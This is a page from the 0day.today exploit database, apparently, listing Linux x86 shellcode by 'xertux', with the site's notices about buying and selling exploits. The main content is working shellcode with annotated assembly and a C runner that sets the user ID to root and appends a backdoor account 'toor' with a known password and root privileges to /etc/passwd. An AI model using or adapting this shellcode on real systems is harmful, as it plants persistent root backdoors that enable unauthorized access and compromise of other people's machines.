0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
linux/x86 setreuid(0) and add user with root's priviledges 105 bytes
==================================================================== linux/x86 setreuid(0) and add user with root's priviledges 105 bytes ==================================================================== #include <stdio.h> /* * Title : linux x86 shellcode setreuid(0, 0) and add an user with root's priviledges on /etc/passwd, 105 bytes * Author : xertux * Platform: Linux X86 * Description : setuid(0) + open(/etc/passwd, e0x441, 0x180) + write(fd, toor:Gf.Dz3qr2izHU:0:0::/:/bin/sh\n, 34) + close(fd) * Add an user "toor" with password "toor" and the root's priviledges at the end of "/etc/passwd" * Size : 105 bytes * */ /* BITS 32 ;setresuid(0,0) xor eax, eax ; eax become 0 xor ebx, ebx ; ebx become 0 xor ecx, ecx ; ecx become 0 cdq ; edx become 0 mov al, 0xa4 ; put call system 164 into eax int 0x80 ; execute setresuid(0,0,0) ;open(/etc/passwd, e0x441, 0x180) push edx ; null string termination push 0x64777373 ; push "sswd" push 0x61702f2f ; push "//pa" push 0x6374652f ; push "/etc" mov ebx, esp ; put "/etc//passwd" into ebx mov WORD cx, 0x441 ; put the O_WRONLY | O_APPEND | O_CREATE argument mov WORD dx, 0x180 ; put the S_IRUSR | S_IWUSR argument push BYTE 0x5 ; put call system open on the stack pop eax ; get the system call number and insert into eax int 0x80 ; execute open(/etc//passwd, O_WRONLY | O_APPEND, S_IRUSR | S_IWUSR) ;write(fd, toor:Gf.Dz3qr2izHU:0:0::/:/bin/sh\n, 34) ==> pass "toor" mov ebx, eax ; put the file descriptor return by open into ebx xor eax, eax ; eax become 0 push eax ; null termination string push WORD 0x0a68 ; push "h\n" push 0x732f6e69 ; push "in/s" push 0x622f3a2f ; push "/:/b" push 0x3a3a303a ; push ":0::" push 0x303a5548 ; push "HU:0" push 0x7a693272 ; push "r2iz" push 0x71337a44 ; push "Dz3q" push 0x2e66473a ; push ":Gf." push 0x726f6f74 ; push "toor" mov ecx, esp ; put "toor:toor:0:0::/:/bin/sh\n" into ebx push BYTE 34 ; put the size of line written on the stack pop edx ; get the size into edx mov al, 0x4 ; put the call system write into eax int 0x80 ; execute write(fd, toor:toor:0:0::/:/bin/sh\n, 34) ;close(fd) push BYTE 0x6 ; put the call system close on the stack pop eax ; put the call system number into eax int 0x80 ; execute close(fd) */ char shellcode[] = "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x52\x68\x73\x73\x77" "\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\x41" "\x04\x66\xba\x80\x01\x6a\x05\x58\xcd\x80\x89\xc3\x31\xc0\x50\x66" "\x68\x68\x0a\x68\x69\x6e\x2f\x73\x68\x2f\x3a\x2f\x62\x68\x3a\x30" "\x3a\x3a\x68\x48\x55\x3a\x30\x68\x72\x32\x69\x7a\x68\x44\x7a\x33" "\x71\x68\x3a\x47\x66\x2e\x68\x74\x6f\x6f\x72\x89\xe1\x6a\x22\x5a" "\xb0\x04\xcd\x80\x6a\x06\x58\xcd\x80"; int main() { printf("[*] Shellcode - length: %d\n", strlen(shellcode)); (*(void(*)())shellcode)(); return 0; } # 0day.today [2024-11-15] #